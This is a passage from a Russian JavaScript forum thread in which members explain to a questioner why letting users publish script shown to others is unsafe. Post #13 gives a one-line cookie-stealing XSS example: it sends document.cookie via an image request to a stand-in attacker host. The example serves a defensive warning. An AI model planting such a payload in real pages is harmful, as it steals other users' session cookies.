Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #11 (permalink)  
Старый 25.01.2012, 14:47
Аватар для B@rmaley.e><e
⊞ Развернуть
Отправить личное сообщение для B@rmaley.e><e Посмотреть профиль Найти все сообщения от B@rmaley.e><e
 
Регистрация: 11.01.2010
Сообщений: 1,810

qwertyuiop10, потому что Ваш подход небезопасен.
Ответить с цитированием
  #12 (permalink)  
Старый 25.01.2012, 17:15
Аспирант
Отправить личное сообщение для qwertyuiop10 Посмотреть профиль Найти все сообщения от qwertyuiop10
 
Регистрация: 29.09.2011
Сообщений: 42

B@rmaley.e><e,

Ну так я же спрашиваю: почему небезопасен? Поточнее пожалуйста.
Ответить с цитированием
  #13 (permalink)  
Старый 25.01.2012, 17:20
Аватар для Aetae
Тлен
Отправить личное сообщение для Aetae Посмотреть профиль Найти все сообщения от Aetae
 
Регистрация: 02.01.2010
Сообщений: 6,497

Вам же сказали - если человек может воспользоваться этим только для себя - всё нормально.
Но если он может показать написанное другим, то нет.

Сам себе человек и так может что угодно запустить на вашей странице.
Если же он может дать другим посмотреть написанное, то нет ничег проще чем написать например:
document.write('<img src="http://l33thaxor.net/?'+encodeURIComponent(document.cookie)+'">')
__________________
29375, 35

Последний раз редактировалось Aetae, 25.01.2012 в 17:24.
Ответить с цитированием
  #14 (permalink)  
Старый 25.01.2012, 20:01
Аспирант
Отправить личное сообщение для qwertyuiop10 Посмотреть профиль Найти все сообщения от qwertyuiop10
 
Регистрация: 29.09.2011
Сообщений: 42

Ну а на счет мини-подигона на xiper.net? Там юзер меняет только в своём браузере. И вообще, не видел ни одного полигона, реализованного без обращения к серверу, хотя везде пользователь меняет страницы в своём браузере.
Ответить с цитированием
  #15 (permalink)  
Старый 25.01.2012, 21:49
Аватар для Aetae
Тлен
Отправить личное сообщение для Aetae Посмотреть профиль Найти все сообщения от Aetae
 
Регистрация: 02.01.2010
Сообщений: 6,497

Хз как оно там: может статьи пишутся юзерами,мож задел на будущее, who cares.
__________________
29375, 35
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
вложенные фреймы Леночка Элементы интерфейса 13 20.05.2012 11:05
Динамические формы. ака Выпадающие списки :) sochinec Общие вопросы Javascript 5 18.04.2012 17:19
Фреймы и document Почемучкин Events/DOM/Window 11 09.12.2011 12:46
Как заставить jQuery считать динамические объекты append'a "на лету"? walabyn jQuery 2 08.09.2011 12:07
Чат vochat и фреймы Abaza Работа 2 02.11.2009 14:40